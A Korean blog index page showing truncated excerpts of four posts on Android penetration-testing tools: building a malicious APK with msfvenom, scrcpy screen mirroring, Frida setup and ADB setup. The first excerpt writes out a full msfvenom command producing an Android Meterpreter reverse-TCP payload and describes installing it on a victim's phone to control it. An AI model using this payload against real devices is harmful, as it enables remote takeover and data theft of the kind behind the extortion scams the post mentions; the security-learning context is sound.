최근 몸캠 피싱이나 보이스 피싱과 같은 사기피해 사건이 꾸준히 늘고 있다. 뿐 만아니라 택배를 가장한 문자나 코로나와 관련된 문자로 피해자들에게 악성앱을 설치하도록 유도한뒤 데이터를 다 빼가거나 협박을하여 이득을 취한다. Tip 게시판에 적어둔 Msfvenom을 이용하여 악성앱을 제작해 리버스 쉘과 같은 원리로 동작하는 리버스 TCP 공격을 이용하여 피해자의 단말기를 제어할 수 있다. 먼저 휴대폰을 제어할 공격PC의 IP 확인 msfvenom으로 페이로드를 android로 생성하여 apk 생성 msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=포트지정 R > 암거나.apk 생성된 apk를 피해 단말기로 옮겨서 설치한다. 공격자의 PC에서는 리버스쉘과..

안드로이드 진단때 간혹 화면 캡처 방지코드가 적용되어있는 앱들이 있다. 그럴 때는 증적을 남기기위해 scrcpy 툴을 사용한다. https://github.com/Genymobile/scrcpy/releases/ Releases · Genymobile/scrcpy Display and control your Android device. Contribute to Genymobile/scrcpy development by creating an account on GitHub. github.com 압축을 푼 후 단말기를 usb로 연결한 후 scrcpy.exe를 실행하면 된다. 이 툴은 adb를 이용하여 동작하며 미러링 도구중에 가장 반응속도도 빠르고 단말기와 차이없는 레이턴시로 동작한다. 마우스 좌클릭 -> ..

Frida는 Python 기반으로 제작된 도구 중 하나로 정말 많고 강력한 기능들이 많다 요즘은 불가피하게 꼭 써야하는 도구 중 하나로 생각될 만큼 좋은 도구이다. 일단 기본적으로 파이썬 기반인만큼 파이썬을 설치해야한다. https://www.python.org/ Welcome to Python.org The official home of the Python Programming Language www.python.org 파이썬의 파이프기능을 이용하여 쉽게 설치가 가능하다 pip install frida pip install frida-tools 잘 설치가 되었다면 버전이 나온다 이제 단말기에 넣어줄 서버를 가져와야한다. https://github.com/frida/frida/releases Releas..

ADB(Android Debug bridge)는 안드로이드 단말기를 모의해킹할 때 자주 사용되는 도구 중 하나다. 일단 https://developer.android.com/studio/index.html#downloads Download Android Studio and SDK tools | Android Developers The official IDE for Android app developers. developer.android.com 여기서 안드로이드 스튜디오 or Android SDK 를 설치해준다. 아래 경로에 adb.exe가 설치되어 있다면 잘 설치된거다. 이제 사용하기 편하도록 환경변수 설정을 하면 좋다. 내 컴퓨터 -> 속성 -> 설정 변경 -> 고급 -> 환경 변수 사용자 변수 편집..